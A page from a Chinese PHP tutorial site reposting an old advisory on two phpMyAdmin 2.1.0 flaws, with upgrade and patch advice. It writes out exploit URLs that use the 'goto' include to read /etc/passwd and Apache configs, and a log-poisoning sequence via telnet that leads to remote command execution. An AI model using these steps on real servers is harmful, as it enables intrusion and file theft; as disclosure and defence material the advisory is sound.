微信公众号 讲师中心
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机/移动开发 手机游戏
搜索
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程
自媒体 新闻
首页 > 后端开发 > php教程 > 正文

phpMyAdmin2.1.0存在两个漏洞_PHP教程

php中文网
发布: 2016-07-13 17:09:00
原创
1069人浏览过

phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/629808.htmlTechArticlephpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装...
相关标签:
phpmyadmin

大家都在看:

PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
收藏 点赞
上一篇:如何通过Session文件进行攻击?_PHP教程 下一篇:密码随机函数_PHP教程
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
php网站前端框架版本怎么优化升级_php网站前端框架升级与兼容性能优化方法 答案:升级PHP网站前端框架需稳扎稳打,先评估技术栈与LTS版本适配性,查阅官方升级日志,分阶段小版本迭代,检测依赖兼容性,保留旧类名、封装不兼容组件,启用sourcemap与Polyfill,结合代码分割、资源压缩、缓存策略和懒加载优化性能,每步验证确保稳定。
2025-11-11 13:56:02
675
如何设置macOS Big Sur上的PHP与Laravel的详细步骤? 首先安装Homebrew,再通过它安装PHP8.1并配置环境变量,接着安装Composer,用其创建Laravel项目,最后配置MySQL并运行迁移。
2025-11-11 13:33:02
295
php怎么用post_PHP POST请求参数接收与表单处理方法 首先检查是否正确使用$_POST接收数据,确保表单method为post且input有name属性;若提交JSON等格式,需用file_get_contents(‘php://input’)读取原始数据并解析;含文件上传时设置enctype为multipart/form-data,结合$_FILES处理文件;最后必须过滤验证输入,防止安全风险。
2025-11-11 13:29:27
469
PHP数据分片加载函数逻辑错误问题排查与分片策略教程 分片加载异常因边界计算错误或策略不当,需检查总数据量、分片大小及偏移公式;采用游标法避免重复;用array_chunk处理内存数据;通过主键范围分片实现数据库级并行查询;利用生成器yield实现低内存流式加载。
2025-11-11 13:22:02
212
php代码并发处理能力低怎么解决_php代码高并发处理优化与性能提升方法 PHP虽为单线程,但通过升级至PHP8、使用Swoole等异步框架、优化数据库查询、引入Redis缓存、静态化页面、CDN分发、负载均衡与微服务拆分,可显著提升并发处理能力,轻松应对高并发场景。
2025-11-11 13:17:02
666
PHP会话隔离:在同一服务器不同路径下实现独立会话管理 本文深入探讨了在同一域名和服务器上运行多个PHP应用时,会话(Session)自动共享的问题。我们将解释默认行为背后的原理,并提供多种策略,包括配置会话名称、指定会话存储路径以及调整会话Cookie作用域,以实现不同应用间会话的有效隔离,确保用户体验的独立性。
2025-11-11 13:11:19
606
Node.js与PHP服务间通信方案:WebSocket的实践与评估 本文深入探讨了Node.js服务器与PHP网站之间高效通信的策略,重点评估了基于WebSocket的远程过程调用(RPC)方案。通过详细分析运行期和开发期关键指标,如速度、内存、稳定性及开发难度,文章论证了在本地环境中使用WebSocket进行服务器间通信的有效性与优势,并建议在满足需求的情况下,维持现有稳定可靠的解决方案。
2025-11-11 13:11:00
554
在Laravel应用中正确处理和解析外部PHP API的JSON响应 本教程旨在指导开发者如何在Laravel应用中,利用其强大的HTTP客户端,高效且准确地接收并解析来自外部PHPAPI的JSON响应。文章将详细阐述外部API正确发送JSON响应的最佳实践,以及Laravel客户端如何利用->json()或->object()方法避免常见的json_decode错误,确保数据顺利访问。
2025-11-11 13:10:13
589
如何从 Laravel Collection 中过滤出具有非空字符串值的记录 本文详细介绍了在Laravel应用中,如何高效地从已获取的Collection中筛选出特定字段值不为空字符串的记录。针对直接使用where()方法在Collection上进行非空字符串判断的常见误区,文章推荐并演示了利用filter()方法结合!empty()函数来实现精确、灵活的数据过滤,避免了不必要的数据库二次查询,提升了代码效率和可读性。
2025-11-11 13:10:01
202
jQuery AJAX发送复杂数据(含数组)到PHP的完整教程 本教程详细介绍了如何使用jQueryAJAX将包含复杂数据(特别是数组)的表单信息发送到PHP后端进行处理。核心在于客户端使用JSON.stringify()将JavaScript对象转换为JSON字符串,并在服务器端PHP中使用json_decode()进行解析。文章还涵盖了jQueryAJAX请求中的最佳实践,如选择器缓存和链式操作,以提升代码效率和可维护性。
2025-11-11 13:09:19
918
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部